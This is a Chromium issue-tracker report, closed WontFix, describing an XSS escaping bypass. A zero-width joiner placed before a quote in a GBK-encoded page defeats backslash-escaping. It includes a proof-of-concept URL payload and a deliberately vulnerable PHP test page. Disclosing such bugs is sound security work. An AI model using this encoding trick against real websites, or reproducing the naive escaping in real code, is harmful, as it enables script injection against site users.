New issue
Advanced search Search tips

Issue 688771 link

Starred by 1 user

Issue metadata

Status: WontFix
Owner:
Closed: Feb 2017
Components:
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 2
Type: Bug-Security



Sign in to add a comment

Chrome / firefox / ie render incorrect ‍ + \ with charset GBK lead to xss

Reported by unkowndo...@gmail.com, Feb 5 2017

Issue description

UserAgent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Steps to reproduce the problem:
1. view http://localhost/test.php?xss=111%E2%80%8D%22;alert(0);//

test.php
_____________________________
<?php
$xss = $_GET['xss'];
$xss = str_replace('"', '\"', $xss);
$xss = str_replace("'", "\'", $xss);
?>
<html>
<head>
<!-- <meta http-equiv="content-type" content="text/html;charset=utf-8"> -->
<meta http-equiv="content-type" content="text/html;charset=GBK">
<title>test</title>
<script>
console.log(document.charset)
</script>
<script>
a = "<?php echo $xss;?>"
console.log(a)
</script>
</head>
</html>

What is the expected behavior?
expected " replace \"

What went wrong?
replace \" bypassed

Did this work before? N/A 

Chrome version: 56.0.2924.87  Channel: stable
OS Version: 6.1 (Windows 7, Windows Server 2008 R2)
Flash Version: Shockwave Flash 24.0 r0

 
Components: Blink>SecurityFeature
Owner: tsepez@chromium.org
Status: WontFix (was: Unconfirmed)
Thanks for the report.

This exploit is fundamentally an issue with the website itself not properly escaping untrusted input. That is, the security issue is in the website: Chromium can only do so much in these situations. See https://www.chromium.org/Home/chromium-security/security-faq#TOC-Are-XSS-filter-bypasses-considered-security-bugs-
Project Member

Comment 2 by sheriffbot@chromium.org, May 15 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment